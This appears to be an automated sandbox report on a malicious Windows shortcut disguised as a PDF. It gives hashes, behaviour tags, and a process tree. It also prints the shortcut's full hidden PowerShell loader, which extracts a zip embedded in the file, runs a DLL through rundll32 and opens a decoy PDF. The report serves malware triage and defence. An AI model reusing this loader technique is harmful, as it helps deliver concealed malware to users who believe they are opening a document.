a7a56f7fcbd4520b634a03740b8c62f19c19f11340902659475b1049e2013cd7

Analysis

max time kernel
45s
max time network
49s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
10-02-2023 15:05

Target

Documento.pdf.lnk
Size

592KB
MD5

2a26b3354a0daeb38079a62471ab5ba8
SHA1

711a6790e2e50a949297d10c47e9fc3e8d2632fb
SHA256

7cc53f1b2b4eac4e9acd5722cc179ba4094f3101ec7b9e3874755ea501fa4aa3
SHA512

e5620f60dea102742f0fb0252a87647bc3ee4eaf304866f3d028f5b0868e3a2179a1a9f46b46faefd077de09348b25c962b8a41eecfb8768a56c9fb4c2aa21cb
SSDEEP

12288:3HQSYtswIsMXhZEpUrvXVX1dPb7dnJGnpu8QjUDZUndu8kd:37RsMXhuePVFVJknpu8Qj68kd

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1052 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1052 powershell.exe

pid	process
1052	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1052	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

cmd.execmd.exepowershell.exe

description	pid	process	target process
PID 1368 wrote to memory of 1740	1368	cmd.exe	cmd.exe
PID 1368 wrote to memory of 1740	1368	cmd.exe	cmd.exe
PID 1368 wrote to memory of 1740	1368	cmd.exe	cmd.exe
PID 1740 wrote to memory of 1052	1740	cmd.exe	powershell.exe
PID 1740 wrote to memory of 1052	1740	cmd.exe	powershell.exe
PID 1740 wrote to memory of 1052	1740	cmd.exe	powershell.exe
PID 1052 wrote to memory of 740	1052	powershell.exe	rundll32.exe
PID 1052 wrote to memory of 740	1052	powershell.exe	rundll32.exe
PID 1052 wrote to memory of 740	1052	powershell.exe	rundll32.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Documento.pdf.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 00607058} ^| Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = 'C:\Users\Admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[002456..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force ^| Out-Null;^& rundll32.exe $obf_dir\bloated-pestilence.dll,runner; .\sample.pdf
2⤵
- Suspicious use of WriteProcessMemory
PID:1740

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\bloated-pestilence.dll runner
4⤵
PID:740

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/740-97-0x0000000000000000-mapping.dmp

Download
memory/1052-90-0x0000000000000000-mapping.dmp

Download
memory/1052-94-0x000007FEF3740000-0x000007FEF4163000-memory.dmp

Filesize
10.1MB

Download
memory/1052-95-0x000007FEF2BE0000-0x000007FEF373D000-memory.dmp

Filesize
11.4MB

Download
memory/1052-96-0x0000000002494000-0x0000000002497000-memory.dmp

Filesize
12KB

Download
memory/1052-99-0x000000000249B000-0x00000000024BA000-memory.dmp

Filesize
124KB

Download
memory/1052-98-0x0000000002494000-0x0000000002497000-memory.dmp

Filesize
12KB

Download
memory/1368-54-0x000007FEFBB51000-0x000007FEFBB53000-memory.dmp

Filesize
8KB

Download
memory/1740-88-0x0000000000000000-mapping.dmp

Download